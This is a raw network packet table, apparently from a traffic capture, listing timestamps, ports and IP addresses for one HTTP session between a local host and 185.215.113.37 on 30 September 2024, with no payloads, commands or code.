Sep 30, 2024 07:08:08.401608944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401623011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401638031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401638985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401648045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401654005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401668072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401678085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401712894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401735067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401740074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401742935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401753902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401768923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401783943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401787043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401787043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401806116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401808023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401822090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401827097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401838064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401858091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401870012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401930094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401945114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401958942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401966095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.401973963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401992083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.401993036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402003050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402008057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402023077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402023077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402045965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402050018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402065039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402079105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402086020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402093887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402110100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402111053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402118921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402124882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402138948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402148962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402169943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402177095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402187109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402206898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402224064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402292967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402307987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402322054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402331114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402335882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402348042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402352095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402355909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402365923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402368069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402384996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402395010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402406931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402424097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402429104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402471066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402486086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402502060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402517080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402527094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402532101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402540922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402548075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402559042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402565002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402570963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402626038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402640104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402642012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402676105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402688980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402693033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402709961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402724981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402731895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402740002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402750969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402754068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402761936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402770042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402787924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402787924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402797937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402951002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402965069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402981043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402996063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.402997017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.402997017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403012037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403024912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403027058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403036118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403043032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403053999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403059959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403067112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403076887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403088093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403093100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403098106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403107882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403121948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403132915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403141975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403170109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403184891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403199911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403213978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403213978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403224945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403230906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403247118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.403247118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403255939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403276920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.403300047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487255096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487284899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487302065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487318039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487318993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487341881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487341881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487354994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487358093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487370968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487396955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487399101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487409115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487415075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487437010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487456083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487509966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487533092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487546921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487554073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487561941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487571955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487576962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487588882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487591982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487607002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487607002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487623930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487623930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487641096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487643957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487656116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487672091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487683058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487687111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487694979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487705946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487715960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487725019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487746000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487782955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487797022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487812042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487826109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487826109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487838030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487843037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487857103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487859964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487869978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487879038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487896919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487915039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487931013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487945080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487960100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487965107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487974882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487974882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487986088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.487992048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.487999916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488008022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488024950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488024950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488049030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488085985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488101959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488130093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488141060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488223076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488236904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488253117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488265038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488269091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488279104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488285065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488297939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488297939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488302946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488317966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488317966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488338947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488353968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488373041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488388062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488400936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488414049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488418102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488430977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488435030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488441944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488450050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488462925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488466024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488471985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488481998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488487005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488498926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488506079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488512039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488523960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488527060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488539934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488543987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488560915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488560915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488584042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488611937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488626957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488642931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488655090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488666058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488683939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488754988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488771915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488785028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488800049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488801003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488811970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488814116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488828897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488831043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488840103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488848925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488862038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488863945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488871098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488879919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488888979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488895893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.488903999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488912106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.488939047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489049911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489068985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489084959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489103079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489103079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489109993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489125967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489125967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489140987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489145041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489156961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489173889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489173889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489185095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489200115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489200115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489218950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489229918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489240885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489245892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489263058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489276886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489289045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489304066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489320993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489331961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489336967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489347935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489353895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489363909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489375114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489396095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489576101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489592075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489605904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489618063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489620924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489634037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489636898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489645004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489650965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489665985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489669085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489676952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489681959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489696980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489696980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489707947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489712954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489727020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489727974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489736080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489742994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489757061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489758015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489772081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489774942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489784002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489787102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489800930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489804983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489818096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489820957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489834070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489835024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489850044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489864111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489880085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:08.489945889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:08.489960909 CEST	80	49730	185.215.113.37	192.168.2.4
